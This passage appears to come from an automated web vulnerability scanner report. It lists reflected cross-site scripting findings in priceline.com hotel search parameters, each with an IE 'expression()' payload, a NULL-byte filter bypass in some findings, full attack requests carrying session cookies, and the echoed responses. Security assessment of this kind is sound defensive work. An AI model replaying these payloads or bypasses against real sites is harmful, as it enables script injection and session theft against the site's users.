Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A13%3A10&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:13:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8954
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="checkInDate" value="10/04/11b5872"style="x:expression(alert(1))"291cab46a60d439a6"/>
...[SNIP]...
4.121. http://travela.priceline.com/hotel/searchHotels.do [checkInDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the checkInDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003a9fe"style%3d"x%3aexpression(alert(1))"7a2a0989c6a was submitted in the checkInDate parameter. This input was echoed as 3a9fe"style="x:expression(alert(1))"7a2a0989c6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011%003a9fe"style%3d"x%3aexpression(alert(1))"7a2a0989c6a&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:43:51 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5463010a201110030043518ac011586110; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A43%3A51&ID=AWAYNETWORK&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:43:51 GMT; Path=/
Set-Cookie: JSESSIONID=9BC2147716533441EF0F5C6A3C231BA2; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8690
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="checkInDate" value="10/09/2011.3a9fe"style="x:expression(alert(1))"7a2a0989c6a"/>
...[SNIP]...
4.122. http://travela.priceline.com/hotel/searchHotels.do [checkOutDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the checkOutDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009ed36"style%3d"x%3aexpression(alert(1))"66b5847273a was submitted in the checkOutDate parameter. This input was echoed as 9ed36"style="x:expression(alert(1))"66b5847273a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011%009ed36"style%3d"x%3aexpression(alert(1))"66b5847273a&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:44:15 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5564010a20111003004415f6a011567632; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A44%3A15&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:44:15 GMT; Path=/
Set-Cookie: JSESSIONID=37A985B3F3388CC173B401D5F9AA8630; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8690
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="checkOutDate" value="10/16/2011.9ed36"style="x:expression(alert(1))"66b5847273a"/>
...[SNIP]...
4.123. http://travela.priceline.com/hotel/searchHotels.do [checkOutDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the checkOutDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed900"style%3d"x%3aexpression(alert(1))"0b6b9d26eee29a0be was submitted in the checkOutDate parameter. This input was echoed as ed900"style="x:expression(alert(1))"0b6b9d26eee29a0be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11ed900"style%3d"x%3aexpression(alert(1))"0b6b9d26eee29a0be&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:17 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5564010a20111003001417a14011745222; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A14%3A17&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:14:17 GMT; Path=/
Set-Cookie: JSESSIONID=F76E5D0ED24F9C3B783169F6F2A9E2AE; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8944
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="checkOutDate" value="10/07/11ed900"style="x:expression(alert(1))"0b6b9d26eee29a0be"/>
...[SNIP]...
4.124. http://travela.priceline.com/hotel/searchHotels.do [cityName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the cityName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 730ce"style%3d"x%3aexpression(alert(1))"160bb80c2ba97e2cf was submitted in the cityName parameter. This input was echoed as 730ce"style="x:expression(alert(1))"160bb80c2ba97e2cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States730ce"style%3d"x%3aexpression(alert(1))"160bb80c2ba97e2cf&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:16:33 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a5564010a20111003001633bda011715075; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A16%3A33&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:16:33 GMT; Path=/
Set-Cookie: JSESSIONID=55AC5B68C9B9BF32C11F478F8BE2E663; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8944
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="cityName" value="Boston,United States730ce"style="x:expression(alert(1))"160bb80c2ba97e2cf"/>
...[SNIP]...
4.125. http://travela.priceline.com/hotel/searchHotels.do [homepage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the homepage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5918f"style%3d"x%3aexpression(alert(1))"cadbe4bcd41bf55b1 was submitted in the homepage parameter. This input was echoed as 5918f"style="x:expression(alert(1))"cadbe4bcd41bf55b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y5918f"style%3d"x%3aexpression(alert(1))"cadbe4bcd41bf55b1&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:15:18 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a4663010a20111003001518a50011747590; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A15%3A18&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:15:18 GMT; Path=/
Set-Cookie: JSESSIONID=52ACF5E992CFB1F936B65D8A5FD32321; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8955
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="homepage" value="Y5918f"style="x:expression(alert(1))"cadbe4bcd41bf55b1"/>
...[SNIP]...
4.126. http://travela.priceline.com/hotel/searchHotels.do [hotelBrand parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the hotelBrand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7150c"style%3d"x%3aexpression(alert(1))"237f1ca6f05241f7 was submitted in the hotelBrand parameter. This input was echoed as 7150c"style="x:expression(alert(1))"237f1ca6f05241f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand=7150c"style%3d"x%3aexpression(alert(1))"237f1ca6f05241f7 HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:19:09 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a5463010a20111003001909c56011718275; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A19%3A09&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:19:09 GMT; Path=/
Set-Cookie: JSESSIONID=3C154D773CBD3649F97FF826F719F01C; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8943
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="hotelBrand" value="7150c"style="x:expression(alert(1))"237f1ca6f05241f7"/>
...[SNIP]...
4.127. http://travela.priceline.com/hotel/searchHotels.do [hotelBrand parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the hotelBrand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ff7"style%3d"x%3aexpression(alert(1))"82960f0a095 was submitted in the hotelBrand parameter. This input was echoed as 29ff7"style="x:expression(alert(1))"82960f0a095 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=29ff7"style%3d"x%3aexpression(alert(1))"82960f0a095&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:43:14 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5064010a20111003004314002011599695; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A43%3A14&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:43:14 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8667
